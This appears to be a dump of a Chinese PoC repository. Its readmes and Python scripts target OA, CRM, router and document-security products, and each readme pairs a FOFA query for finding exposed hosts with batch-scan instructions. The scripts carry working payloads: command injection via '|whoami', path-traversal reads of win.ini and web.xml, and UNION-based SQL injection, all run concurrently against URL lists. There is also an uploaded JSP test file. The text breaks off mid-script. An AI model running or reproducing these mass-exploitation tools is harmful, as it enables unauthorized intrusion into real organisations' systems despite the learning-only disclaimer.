免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa:title="U9-登录" 6 | 7 | 8 | 9 | 批量poc(记得安装库) 10 | 11 | python poc.py -u 12 | 13 | python poc.py -f .txt 14 | 15 | 结果保存至result.txt 16 | 17 | 18 | 19 | ## 入圈(限时体验) 20 | 21 | ![image-20240127122138808](assets/image-20240127122138808.png) 22 | 23 | ![image-20240121123620660](assets/image-20240121123620660.png)s 24 | 25 | -------------------------------------------------------------------------------- /20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/readme.md: -------------------------------------------------------------------------------- 1 | # 万户OA-senddocument_import.jsp任意文件上传漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa 6 | 7 | ``` 8 | app="万户网络-ezOFFICE"&&body="/defaultroot/" 9 | ``` 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | ![image-20240202203022822](assets/image-20240202203022822.png) 20 | 21 | ## 入圈(限时体验) 22 | 23 | 24 | 25 | ![image-20240121123620660](assets/image-20240121123620660.png)s 26 | 27 | -------------------------------------------------------------------------------- /20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/y1.jsp: -------------------------------------------------------------------------------- 1 | <%out.println("y1k1ng");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> -------------------------------------------------------------------------------- /20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入/readme.md: -------------------------------------------------------------------------------- 1 | # 亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa 6 | 7 | ``` 8 | app="亿赛通-电子文档安全管理系统" 9 | ``` 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | ![image-20240202203022822](assets/image-20240202203022822.png) 20 | 21 | ## 入圈(限时体验) 22 | 23 | 24 | 25 | ![image-20240121123620660](assets/image-20240121123620660.png)s 26 | 27 | -------------------------------------------------------------------------------- /20240205帮管客CRM 文件上传/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240205帮管客CRM 文件上传/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240205帮管客CRM 文件上传/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240205帮管客CRM 文件上传/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240205帮管客CRM 文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # 帮管客CRM 文件上传 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa 6 | 7 | ``` 8 | FOFA:app="帮管客-CRM" 9 | ``` 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | ![image-20240202203022822](assets/image-20240202203022822.png) 20 | 21 | ## 入圈(限时体验) 22 | 23 | 24 | 25 | ![image-20240121123620660](assets/image-20240121123620660.png)s 26 | 27 | -------------------------------------------------------------------------------- /20240205帮管客CRM 文件上传/y1.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/assets/Snipaste_2024-02-07_19-04-37.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240206百为智能流控路由器RCE/assets/Snipaste_2024-02-07_19-04-37.png -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240206百为智能流控路由器RCE/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240206百为智能流控路由器RCE/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 
8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 百为智能流控路由器RCE poc 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | path = "/goform/webRead/open/?path=|whoami" 39 | url = target + path 40 | headers = { 41 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0', 42 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 43 | 'Accept-Encoding': 'gzip, deflate', 44 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 45 | 'Connection': 'close', 46 | 'Upgrade-Insecure-Requests': '127' 47 | } 48 | 49 | 50 | 51 | try: 52 | # conn = http.client.HTTPConnection(target) 53 | # conn.request("POST", path, body.encode("utf-8"), headers) 54 | # response1 = conn.getresponse() 55 | response1 = requests.get(url, headers=headers, verify=False, timeout=15) 56 | # print(response1.status_code) 57 | if response1.status_code == 200 and 'admin' in response1.text: 58 | 59 | print(f"[++++++] {target} 存在 百为智能流控路由器RCE") 60 | with open("result.txt", "a+", encoding="utf-8") as f: 61 | f.write(target + "\n") 62 | 63 | else: 64 | print(f"[-] {target} 未发现") 65 | 66 | except Exception as e: 67 | print(f"[*] {target} error: {str(e)}") 68 | 69 | 70 | def extract_host(url): 71 | """ 72 | 从 URL 中提取主机地址和端口号,返回 (host, port) 73 | """ 74 | match = 
re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 75 | if match: 76 | prefix, host, port = match.groups() 77 | if not port: 78 | if prefix and "https" in prefix: 79 | port = "443" 80 | else: 81 | port = "80" 82 | return host, int(port) 83 | else: 84 | return None, None 85 | 86 | 87 | def main(): 88 | banner() 89 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 90 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 91 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 92 | args = parser.parse_args() 93 | 94 | if args.url and not args.file: 95 | if "https://" in args.url or "http://" in args.url: 96 | url = args.url 97 | else: 98 | host, port = extract_host(args.url) 99 | url = f"http://{host}:{port}" 100 | poc(url) 101 | 102 | elif args.url is None and args.file is not None: 103 | url_list = [] 104 | with open(args.file, "r", encoding="utf-8") as f: 105 | for url in f.readlines(): 106 | url = url.strip().replace("\n", "") 107 | if "https://" in url or "http://" in url: 108 | url = url 109 | else: 110 | host, port = extract_host(url) 111 | url = f"http://{host}:{port}" 112 | url_list.append(url) 113 | 114 | pool = Pool(10) 115 | pool.map(poc, url_list) 116 | pool.close() 117 | pool.join() 118 | 119 | else: 120 | parser.print_help() 121 | 122 | 123 | if __name__ == '__main__': 124 | main() 125 | -------------------------------------------------------------------------------- /20240206百为智能流控路由器RCE/readme.md: -------------------------------------------------------------------------------- 1 | # 百为智能流控路由器RCE 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa 6 | 7 | ``` 8 | title="BYTEVALUE 智能流控路由器" 9 | ``` 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | python poc.py -f .txt 16 | 17 | 结果保存至result.txt 18 | 19 | ![Snipaste_2024-02-07_19-04-37](assets/Snipaste_2024-02-07_19-04-37.png) 20 | 21 | ![image-20240202203022822](assets/image-20240202203022822.png) 22 | 23 | ## 入圈(限时体验) 24 | 25 | 26 | 27 | ![image-20240121123620660](assets/image-20240121123620660.png)s 28 | 29 | -------------------------------------------------------------------------------- /20240218WordPress Plugin HTML5 Video Player SQL注入漏洞/assets/image-20240628210919948.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240218WordPress Plugin HTML5 Video Player SQL注入漏洞/assets/image-20240628210919948.png -------------------------------------------------------------------------------- /20240218WordPress Plugin HTML5 Video Player SQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # WordPress Plugin HTML5 Video Player SQL注入漏洞(CVE-2024-1061) 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt![image-20240628210919948](assets/image-20240628210919948.png) 14 | 15 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /20240219用友政务A++V832产品未授权访问漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240219用友政务A++V832产品未授权访问漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240219用友政务A++V832产品未授权访问漏洞/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240219用友政务A++V832产品未授权访问漏洞/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240219用友政务A++V832产品未授权访问漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友政务A++V832产品未授权访问漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 16 | 17 | ![image-20240202203022822](assets/image-20240202203022822.png) 18 | 19 | ## 入圈(限时体验) 20 | 21 | 22 | 23 | ![image-20240121123620660](assets/image-20240121123620660.png)s 24 | 25 | -------------------------------------------------------------------------------- /20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 
| 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | path = "/CDGServer3/ClientAjax" 39 | url = target + path 40 | headers = { 41 | "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", 42 | "Content-Type": "application/x-www-form-urlencoded", 43 | "Accept-Encoding": "gzip, deflate, br" 44 | } 45 | 46 | data = { 47 | "command": "downclientpak", 48 | "InstallationPack": "../../../../../../../../../../windows/win.ini", 49 | "forward": "index.jsp" 50 | } 51 | 52 | try: 53 | # conn = http.client.HTTPConnection(target) 54 | # conn.request("POST", path, body.encode("utf-8"), headers) 55 | # response1 = conn.getresponse() 56 | response1 = requests.get(url, headers=headers, verify=False, timeout=15) 57 | # print(response1.status_code) 58 | 59 | 60 | if response1.status_code == 200 and "; for 16-bit app support" in response1.text: 61 | 62 | print(f"[++++++] {target} 存在 ClientAjax 任意文件下载") 63 | with open("result.txt", "a+", encoding="utf-8") as f: 64 | f.write(target + "\n") 65 | 66 | else: 67 | print(f"[-] {target} 未发现") 68 | 69 | except Exception as e: 70 | print(f"[*] {target} error: {str(e)}") 71 | 72 | 73 | def extract_host(url): 74 | """ 75 | 从 URL 中提取主机地址和端口号,返回 (host, port) 76 | """ 77 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 78 | if match: 79 | prefix, host, port = match.groups() 80 | if not port: 81 | if prefix and "https" in prefix: 82 | port = "443" 83 | else: 84 | port = "80" 85 | return host, int(port) 86 | else: 87 | return None, None 88 | 89 | 90 | def main(): 91 | banner() 92 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 93 | parser.add_argument("-u", "--url", dest="url", type=str, help=" 
example: http://www.example.com") 94 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 95 | args = parser.parse_args() 96 | 97 | if args.url and not args.file: 98 | if "https://" in args.url or "http://" in args.url: 99 | url = args.url 100 | else: 101 | host, port = extract_host(args.url) 102 | url = f"http://{host}:{port}" 103 | poc(url) 104 | 105 | elif args.url is None and args.file is not None: 106 | url_list = [] 107 | with open(args.file, "r", encoding="utf-8") as f: 108 | for url in f.readlines(): 109 | url = url.strip().replace("\n", "") 110 | if "https://" in url or "http://" in url: 111 | url = url 112 | else: 113 | host, port = extract_host(url) 114 | url = f"http://{host}:{port}" 115 | url_list.append(url) 116 | 117 | pool = Pool(10) 118 | pool.map(poc, url_list) 119 | pool.close() 120 | pool.join() 121 | 122 | else: 123 | parser.print_help() 124 | 125 | 126 | if __name__ == '__main__': 127 | main() 128 | -------------------------------------------------------------------------------- /20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载/readme.md: -------------------------------------------------------------------------------- 1 | # 亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa:title="电子文档安全管理系统" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 16 | 17 | ![image-20240202203022822](assets/image-20240202203022822.png) 18 | 19 | ## 入圈(限时体验) 20 | 21 | 22 | 23 | ![image-20240121123620660](assets/image-20240121123620660.png)s 24 | 25 | -------------------------------------------------------------------------------- /20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # 用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | title="用友U8-OA" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 16 | 17 | ![image-20240202203022822](assets/image-20240202203022822.png) 18 | 19 | ## 入圈(限时体验) 20 | 21 | 22 | 23 | ![image-20240121123620660](assets/image-20240121123620660.png)s 24 | 25 | -------------------------------------------------------------------------------- /20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 
`8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a 华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | path = "/OAapp/jsp/trace/ntkodownload.jsp?filename=../../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml" 39 | url = target + path 40 | headers = { 41 | "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", 42 | "Accept": "*/*", 43 | "Connection": "Keep-Alive" 44 | } 45 | 46 | 47 | 48 | try: 49 | # conn = http.client.HTTPConnection(target) 50 | # conn.request("POST", path, body.encode("utf-8"), headers) 51 | # response1 = conn.getresponse() 52 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 53 | print(response1.headers) 54 | 55 | if response1.status_code == 200 and "web.xml" in response1.headers.get("Content-Disposition", ""): 56 | print(f"[++++++] {target} 存在 任意文件读取") 57 | with open("result.txt", "a+", encoding="utf-8") as f: 58 | f.write(target + "\n") 59 | else: 60 | print(f"[-] {target} 未发现") 61 | 62 | except Exception as e: 63 | print(f"[*] {target} error: {str(e)}") 64 | 65 | 66 | def extract_host(url): 67 | """ 68 | 从 URL 中提取主机地址和端口号,返回 (host, port) 69 | """ 70 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 71 | if match: 72 | prefix, host, port = match.groups() 73 | if not port: 74 | if prefix and "https" in prefix: 75 | port = "443" 76 | else: 77 | port = "80" 78 | return host, int(port) 79 | else: 80 | return None, None 81 | 82 | 83 | def main(): 84 | banner() 85 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 86 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 87 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 88 | args 
= parser.parse_args() 89 | 90 | if args.url and not args.file: 91 | if "https://" in args.url or "http://" in args.url: 92 | url = args.url 93 | else: 94 | host, port = extract_host(args.url) 95 | url = f"http://{host}:{port}" 96 | poc(url) 97 | 98 | elif args.url is None and args.file is not None: 99 | url_list = [] 100 | with open(args.file, "r", encoding="utf-8") as f: 101 | for url in f.readlines(): 102 | url = url.strip().replace("\n", "") 103 | if "https://" in url or "http://" in url: 104 | url = url 105 | else: 106 | host, port = extract_host(url) 107 | url = f"http://{host}:{port}" 108 | url_list.append(url) 109 | 110 | pool = Pool(10) 111 | pool.map(poc, url_list) 112 | pool.close() 113 | pool.join() 114 | 115 | else: 116 | parser.print_help() 117 | 118 | 119 | if __name__ == '__main__': 120 | main() 121 | -------------------------------------------------------------------------------- /20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | app="华天动力-OA8000" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | python poc.py -u 12 | 13 | python poc.py -f .txt 14 | 15 | 结果保存至result.txt 16 | 17 | ![](assets/Snipaste_2024-02-07_19-04-37.png) 18 | 19 | ![image-20240202203022822](assets/image-20240202203022822.png) 20 | 21 | ## 入圈(限时体验) 22 | 23 | 24 | 25 | ![image-20240121123620660](assets/image-20240121123620660.png)s 26 | 27 | -------------------------------------------------------------------------------- /20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/assets/image-20240202203022822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/assets/image-20240202203022822.png -------------------------------------------------------------------------------- /20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | 
`88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 九思OA软件user_list_3g.jsp存在SQL注入漏洞 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/jsoa/wap2/personalMessage/user_list_3g.jsp?userIds=1&userNames=1&content=1&org_id=1%20union/**/select/**/1,md5(1)%20%23" 40 | url = target + path 41 | headers = { 42 | 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1', 43 | 'Accept': '*/*', 44 | 'Connection': 'Keep-Alive' 45 | } 46 | md5_value = hashlib.md5("1".encode()).hexdigest() 47 | 48 | try: 49 | # conn = http.client.HTTPConnection(target) 50 | # conn.request("POST", path, body.encode("utf-8"), headers) 51 | # response1 = conn.getresponse() 52 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 53 | # print(response1.headers) 54 | 55 | if response1.status_code == 200 and md5_value in response1.text: 56 | print(f"[++++++] {target} 存在 sql注入") 57 | with open("result.txt", "a+", encoding="utf-8") as f: 58 | f.write(target + "\n") 59 | else: 60 | print(f"[-] {target} 未发现") 61 | 62 | except Exception as e: 63 | print(f"[*] {target} error: {str(e)}") 64 | 65 | 66 | def extract_host(url): 67 | """ 68 | 从 URL 中提取主机地址和端口号,返回 (host, port) 69 | """ 70 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 71 | if match: 72 | prefix, host, port = match.groups() 73 | if not port: 74 | if prefix and "https" in prefix: 75 | port = "443" 76 | else: 77 | port = "80" 78 | return host, int(port) 79 | else: 80 | return None, None 81 | 82 | 83 | def main(): 84 | banner() 85 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 86 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 87 | parser.add_argument("-f", "--file", 
